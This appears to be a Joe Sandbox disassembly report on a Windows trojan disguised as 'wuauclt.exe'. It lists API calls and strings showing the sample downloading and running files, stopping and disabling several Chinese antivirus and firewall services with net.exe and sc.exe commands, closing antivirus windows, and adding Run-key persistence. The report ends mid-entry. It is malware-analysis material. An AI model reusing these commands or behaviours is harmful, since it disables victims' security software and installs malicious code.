30 API calls 6263->6264 6265 407e25 6264->6265 6266 4039d0 11 API calls 6265->6266 6267 407e2f 6266->6267 6268 404dd0 27 API calls 6267->6268 6269 407e40 6268->6269 6270 404dd0 27 API calls 6269->6270 6271 407e56 6270->6271 6272 404c18 31 API calls 6271->6272 6273 407e6b 6272->6273 6274 403a24 27 API calls 6273->6274 6275 407e78 6274->6275 6276 407e87 6275->6276 6472 4068d0 InternetGetConnectedState 6275->6472 6278 4039f4 11 API calls 6276->6278 6279 407ea1 6278->6279 6281 404dd0 27 API calls 6280->6281 6282 407f89 6281->6282 6283 404dd0 27 API calls 6282->6283 6284 407f9f 6283->6284 6285 404af8 30 API calls 6284->6285 6286 407fb4 6285->6286 6287 404f2c 28 API calls 6286->6287 6288 407fbc 6287->6288 6289 403b5c 27 API calls 6288->6289 6290 407fc9 6289->6290 6291 404af8 30 API calls 6290->6291 6292 407fe8 6291->6292 6293 407ff7 6292->6293 6519 406708 InternetGetConnectedState 6292->6519 6295 4039f4 11 API calls 6293->6295 6296 408011 6295->6296 6298 408494 46 API calls 6297->6298 6299 4084c7 6298->6299 6301 407c12 6300->6301 6302 407d0f 6300->6302 6301->6302 6305 404f2c 28 API calls 6301->6305 6303 4039f4 11 API calls 6302->6303 6304 407d29 6303->6304 6306 407c31 6305->6306 6307 403b5c 27 API calls 6306->6307 6308 407c3e 6307->6308 6309 404cf4 4 API calls 6308->6309 6310 407c46 6309->6310 6310->6302 6311 404f2c 28 API calls 6310->6311 6312 407c5a 6311->6312 6313 403b5c 27 API calls 6312->6313 6314 407c67 6313->6314 6315 407c7c URLDownloadToFileA 6314->6315 6316 407c92 6315->6316 6317 407c88 Sleep 6315->6317 6318 404f2c 28 API calls 6316->6318 6317->6316 6319 407c9c 6318->6319 6320 403b5c 27 API calls 6319->6320 6321 407ca9 6320->6321 6322 404f2c 28 API calls 6321->6322 6323 407cba 6322->6323 6324 403b5c 27 API calls 6323->6324 6325 407cc7 6324->6325 6326 407ccf CopyFileA Sleep 6325->6326 6327 404f2c 28 API calls 6326->6327 6328 407ced 6327->6328 6329 403b5c 27 API calls 6328->6329 6330 407cfa 6329->6330 6331 407d02 ShellExecuteA 6330->6331 6331->6302 6333 4072b4 
6332->6333 6334 404d04 GetVersionExA 6333->6334 6335 4072cf 6334->6335 6336 4072d8 6335->6336 6337 4076df Sleep 6335->6337 6338 404f2c 28 API calls 6336->6338 6339 404f2c 28 API calls 6337->6339 6340 4072e0 6338->6340 6341 4076f3 6339->6341 6342 403b5c 27 API calls 6340->6342 6343 403b5c 27 API calls 6341->6343 6344 4072ed 6342->6344 6345 407700 6343->6345 6347 4027c8 4 API calls 6344->6347 6346 407708 SetFileAttributesA 6345->6346 6348 404f2c 28 API calls 6346->6348 6349 407304 6347->6349 6350 407716 6348->6350 6351 402560 4 API calls 6349->6351 6352 403b5c 27 API calls 6350->6352 6353 407309 6351->6353 6354 407723 6352->6354 6355 403ed8 4 API calls 6353->6355 6357 404af8 30 API calls 6354->6357 6356 407318 6355->6356 6358 4030f4 4 API calls 6356->6358 6360 407742 6357->6360 6359 40731d 6358->6359 6361 402560 4 API calls 6359->6361 6363 4039f4 11 API calls 6360->6363 6362 407322 6361->6362 6364 402ba8 4 API calls 6362->6364 6365 40775c 6363->6365 6366 40732c 6364->6366 6367 402560 4 API calls 6366->6367 6368 407331 6367->6368 6369 404f2c 28 API calls 6368->6369 6370 407339 6369->6370 6371 403b5c 27 API calls 6370->6371 6372 407346 6371->6372 6373 4027d4 4 API calls 6372->6373 6374 40735d 6373->6374 6375 402560 4 API calls 6374->6375 6376 407362 6375->6376 6377 403ed8 4 API calls 6376->6377 6378 407371 6377->6378 6379 4030f4 4 API calls 6378->6379 6380 407376 6379->6380 6381 402560 4 API calls 6380->6381 6382 40737b 6381->6382 6383 403ed8 4 API calls 6382->6383 6384 40738a 6383->6384 6385 4030f4 4 API calls 6384->6385 6386 40738f 6385->6386 6387 402560 4 API calls 6386->6387 6388 407394 6387->6388 6389 402ba8 4 API calls 6388->6389 6390 40739e 6389->6390 6391 402560 4 API calls 6390->6391 6392 4073a3 Sleep 6391->6392 6393 404f2c 28 API calls 6392->6393 6394 4073be 6393->6394 6395 403c14 27 API calls 6394->6395 6396 4073d3 6395->6396 6397 4073db 15 API calls 6396->6397 6398 407549 6397->6398 6399 40753a SendMessageA 6397->6399 6400 404854 49 API calls 6398->6400 
                                                                            APIs
                                                                            • FindWindowA.USER32(IEFrame,00000000), ref: 0040559A
                                                                            • EnumChildWindows.USER32(?,Function_000053F8), ref: 004055AE
                                                                            • FindWindowExA.USER32(00000000,?,IEFrame,00000000), ref: 004055BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FindWindow$ChildEnumWindows
                                                                            • String ID: IEFrame
                                                                            • API String ID: 761535084-2708574431
                                                                            • Opcode ID: 4df47bb9bfd133a365dc7414d364b90dfc5f5430ccf501699f06f4521e5fb497
                                                                            • Instruction ID: 9fa48d5c06d7a0159174ceea0a4e608dfe463db216e6cfd13e307e5669a667bf
                                                                            • Opcode Fuzzy Hash: 4df47bb9bfd133a365dc7414d364b90dfc5f5430ccf501699f06f4521e5fb497
                                                                            • Instruction Fuzzy Hash: CDE0E2E1380B0232E62020E60C83F2B20498B64B68F20103ABE14B82CAFDFDA814152E
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CA7
                                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CB2
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00404CCB
                                                                            • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00404CDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                            • String ID:
                                                                            • API String ID: 2659516521-0
                                                                            • Opcode ID: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction ID: 5eb690258a486c73d36cab68f814cc2b6737afb4a969db669cbaf41a67b5cd0e
                                                                            • Opcode Fuzzy Hash: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction Fuzzy Hash: F0F0A4B5D0520C66CB10EAE68D859CF73AC5F45314F5006F7B615F21D1E738DB444754
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00404AAA
                                                                            • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00404ABE
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                            • String ID:
                                                                            • API String ID: 4264772764-0
                                                                            • Opcode ID: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction ID: 6d0fe3e5f2a624f7a99d633fdd4a9b0fdd2fbeae9b853d00227d1a052b52fcf1
                                                                            • Opcode Fuzzy Hash: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction Fuzzy Hash: 68E046B13442086BCB00DEAA8CC1E5BB3DDABC8214F50C12ABA08D7285D574E8018AA9

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(0000012C,00000000,0040775D,?,00000003,00000000,00000000), ref: 004073A8
                                                                            • ShellExecuteA.SHELL32(00000000,open,regedit.exe,00000000,noruns.reg,?), ref: 004073E8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop sharedaccess,00000000,00000000), ref: 00407402
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVWSC,00000000,00000000), ref: 0040741C
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVWSC start= disabled,00000000,00000000), ref: 00407436
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVSrvXP,00000000,00000000), ref: 00407450
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVSrvXP start= disabled,00000000,00000000), ref: 0040746A
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop kavsvc,00000000,00000000), ref: 00407484
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config kavsvc start= disabled,00000000,00000000), ref: 0040749E
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsRavMon start= disabled,00000000,00000000), ref: 004074B8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsCCenter,00000000,00000000), ref: 004074D2
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000), ref: 004074EC
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsRavMon,00000000,00000000), ref: 00407506
                                                                            • Sleep.KERNEL32(00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000,open,net.exe), ref: 00407510
                                                                            • FindWindowA.USER32(#32770,00407944), ref: 0040751F
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00407958), ref: 00407531
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00407544
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000), ref: 00407681
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled), ref: 004076D8
                                                                            • Sleep.KERNEL32(00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 004076E4
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 00407709
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShell$FileSleep$AttributesFindWindow$CloseDeleteDirectoryMessageSendValueWindows
                                                                            • String ID: /s $"NoDriveTypeAutoRun"=dword:bd$#32770$Button$CCenter.exe$EGHOST.exe$KVCenter.kxp$KVMonXP.exe$KVSrvXp_1.exe$Kav.exe$KavPFW.exe$KpopMon.exe$Kvsrvxp.exe$Microsoft$Nvsvc32.exe$PFW.exe$RAVMON.exe$RAVTIMER.exe$REGEDIT4$RRfwMain.exe$RavMonD.exe$RavService.exe$RfwMain.exe$Rtvscan.exe$Software\Microsoft\Windows\CurrentVersion\Run$VPTray.exe$[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]$config KVSrvXP start= disabled$config KVWSC start= disabled$config RsCCenter start= disabled$config RsRavMon start= disabled$config kavsvc start= disabled$kav32.exe$kavstart.exe$kavsvc.exe$kvwsc.exe$net.exe$net.exe$net1.exe$noruns.reg$open$regedit.exe$regedit.exe$sc.exe$sc.exe$sc1.exe$stop KVSrvXP$stop KVWSC$stop RsCCenter$stop RsRavMon$stop kavsvc$stop sharedaccess$wuauclt.exe
                                                                            • API String ID: 4147674485-668396500
                                                                            • Opcode ID: 122e0926d8b91529060f292cd892ad0493ca3b46db7fb0a121436a056a01876a
                                                                            • Instruction ID: ad58a2a6b321d20f2a5f7c4230813dddbb1cdd15f012d9e1a88ffbed65f06cfb
                                                                            • Opcode Fuzzy Hash: 122e0926d8b91529060f292cd892ad0493ca3b46db7fb0a121436a056a01876a
                                                                            • Instruction Fuzzy Hash: A6A10DB5F8828526D700B7A68C47F5E75649B84B09F20C47BB7147A2C3CABCB944867F

                                                                            Control-flow Graph

                                                                            [Control-flow graph image not extracted; legend: Executed / Not Executed. Basic blocks 406f74-40720a: six GetDesktopWindow / FindWindowExA / GetWindowTextA enumeration loops (calls to 403b3c and 403e2c), each optionally issuing PostMessageA, followed by FindWindowA / PostMessageA pairs for TKillqqvir, TKqqviru and TApplication/qqav, ending in a call to 4039f4.]
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00406FA4
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FB1
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00406FBC
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00406FE8
                                                                            • GetDesktopWindow.USER32 ref: 00406FF1
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FFE
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407009
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407035
                                                                            • GetDesktopWindow.USER32 ref: 0040703E
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 0040704B
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407056
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407082
                                                                            • GetDesktopWindow.USER32 ref: 0040708B
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407098
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070A3
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 004070CF
                                                                            • GetDesktopWindow.USER32 ref: 004070D8
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 004070E5
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070F0
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 0040711C
                                                                            • GetDesktopWindow.USER32 ref: 00407125
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407132
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 0040713D
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407169
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 00407179
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 0040718F
                                                                            • PostMessageA.USER32(00000000,TKillqqvir,00000000,00000012), ref: 00407195
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071A1
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071B7
                                                                            • PostMessageA.USER32(00000000,TKqqviru,00000000,00000012), ref: 004071BD
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071CC
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071E5
                                                                            • PostMessageA.USER32(00000000,TApplication,qqav,00000012), ref: 004071EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessagePost$DesktopText
                                                                            • String ID: QQAV$QQKav$TApplication$TKillqqvir$TKqqviru$qqav
                                                                            • API String ID: 2345741875-3628034782
                                                                            • Opcode ID: 48fb78569e5be0b899f8b789ec188c633594ebe80db4bb76db74b7e8956db17f
                                                                            • Instruction ID: f35ba248066b91e113d1cf3b3e48b889a6c1fe840748cfa81e74fa6914067d70
                                                                            • Opcode Fuzzy Hash: 48fb78569e5be0b899f8b789ec188c633594ebe80db4bb76db74b7e8956db17f
                                                                            • Instruction Fuzzy Hash: 7C610DB0B8434466E620B6B24D83F5E656D9F94B08F20617FBF00BA2C3D9BCAD11456D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: c7e4ef307231b5727f18d737f42bfdf77d138b8471ae12336459b4f4e1b329ba
                                                                            • Instruction ID: 6a7de7b5178300d5e0790259bd21792f98359187be932f6565a32f3e00f96a55
                                                                            • Opcode Fuzzy Hash: c7e4ef307231b5727f18d737f42bfdf77d138b8471ae12336459b4f4e1b329ba
                                                                            • Instruction Fuzzy Hash: 175143B07442056BD700F7A69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: b86f05e999e844c495e0e50c26fabb8c117fd4a697973720332456d8ac770a48
                                                                            • Instruction ID: 3c3994bb7e487e018b31e22462f638a3ed2aa8583c797724152dc9debaa7126f
                                                                            • Opcode Fuzzy Hash: b86f05e999e844c495e0e50c26fabb8c117fd4a697973720332456d8ac770a48
                                                                            • Instruction Fuzzy Hash: BA5141B07442056BD700FBA69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405970
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725,?,00000000,?,00407FF7,00000001,00000000), ref: 00405982
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004059A7
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725), ref: 004059B5
                                                                            • GetEnvironmentVariableA.KERNEL32(ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000), ref: 00405A2E
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405A3B
                                                                            • SHGetPathFromIDList.SHELL32(?,?), ref: 00405A4B
                                                                              • Part of subcall function 00404D04: GetVersionExA.KERNEL32(?,?,004072CF,00000000,0040775D,?,00000003,00000000,00000000), ref: 00404D15
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405C3C
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405C4E
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405C60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
